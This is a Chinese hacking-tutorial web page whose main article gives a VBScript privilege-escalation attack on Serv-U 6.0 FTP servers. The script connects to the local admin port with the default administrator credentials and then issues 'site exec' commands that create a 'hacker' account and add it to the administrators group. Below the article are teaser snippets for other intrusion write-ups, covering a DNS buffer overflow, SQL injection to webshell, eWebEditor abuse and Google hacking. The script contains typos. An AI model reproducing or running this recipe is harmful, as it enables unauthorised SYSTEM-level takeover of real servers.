Serv-u6.0提权新招
所属分类:
网络安全 / 黑客入侵
阅读数:
180
收藏 0赞 0分享
适用环境:服务器禁用FSO,关掉Wscript.shelll,没有执行权限。
限制:没有更改管理员的密码,或者破解出了Serv-U的管理员的密码。Serv-U默认用户名:localadministrator 密码:#|@$ak#.|k;0@p 下面用MSWinsock。Winsock建立一个连接,并且以System权限添加超级用户,代码如下:
以下是引用片段:
Dim revdata
Dim sendata
Set sock=createobject(“MSWinsock.Winsock”)
Sock.protocol=0
Sock.connect “127.0.0.1”,43958
Sendata=”LocalAdministrator”& chr(10) &chr(13)
Sock.senddata snedata
Sendata=”#|@$ak#.|k;0@p” &chr(10) &chr(13)
Sock.senddata.sendata
使用这个代码就可以连上FTP了,接下来用Sock.senddata sendata 发送添加有执行权限用户的命令,想必大家该知道怎么做了吧,对了,就是用”site exec net user hacker hacker /add” “site exec net localgroup administrators hacker /add”
呵呵,就这样系统权限到手了,祝大家好运!
黑客谈MS07-029域名DNS漏洞利用入侵过程
前言:
MS07-029,Windows 域名系统 (DNS) 服务器服务的远程过程调用 (RPC) 管理接口中存在基于堆栈的缓冲区溢出。漏洞的前提是没打补丁,开启DNS服务的所有版本WINDOWS 2000 Server和WINDOWS 2003 Server。
今天
收藏 0赞 0分享
黑客教你SQL注入Access导出WebShell的方法
热 点:
已经听N个人过说有人已经发现SQL注入Access得到webshell的技术了,也只是听说而已,具体的细节还是不得而知。
最近在看的书中一章提到Jet的安全,然后灵光一闪,呵呵,发现了一种可以利用access导出asp的方法,分享之。
收藏 0赞 0分享
一个注射点,一个webshell甚至系统权限
————只要给我一个注射点,无论什么权限,我都给你一个webshell甚至系统权限
声明:本文仅用于教学目的,如果因为本文造成的攻击后果本人概不负责。因为
发觉其危害过大,原文已经经过大量删减及修改,即使这样本文的危害性
收藏 0赞 0分享
黑客实战:一次简单脚本攻击实例
一、开篇
今天闲着无聊,到本地区的一个社区上转转,那些人污言秽语的,有个帖子还侵犯了一个朋友的版权,跟贴说了那人几句,管理员也不管,实在看不下去了,打算给管理员盆冷水清醒清醒。
二、准备/分析
安全第一,先开个HTTP代理,打开社区的登陆页面,
收藏 0赞 0分享
eWebEditor编辑器成网站中的隐形炸弹
站长在使用eWebEditor的时候是否发现,eWebEditor配置不当会使其成为网站中的隐形炸弹呢?第一次发现这漏洞源于去年的一次入侵,在山穷水尽的时候发现了eWebEditor,于是很简单就获得了WebShell。后来又有好几次利用eWebEditor进行入侵的成功经历,这
收藏 0赞 0分享
系统泄露密码的入侵攻击分析
WINDOWS访问139端口时自动用当前用户、密码连接,造成泄露用户密码,虽然其密码是加密的,但一样可以用来攻击。
下面是SMB的密码认证方式。
WINDOWS的139口的访问过程,箭头表示数据方向:
1.客户端<---------------
收藏 0赞 0分享
看看黑客是怎样使用Google黑掉Windows服务器
在我的《为什么使用Google扫描安全漏洞》的技巧中,我讨论了如何使用Google.com来执行对你的面向公众的服务器的安全扫描――包括Windows、IIS、Apache和(但愿不会如此!)SQL Server。你能使用它得到服务器的信息、包含敏感信息的文件和检测出&ldquo
收藏 0赞 0分享
查看更多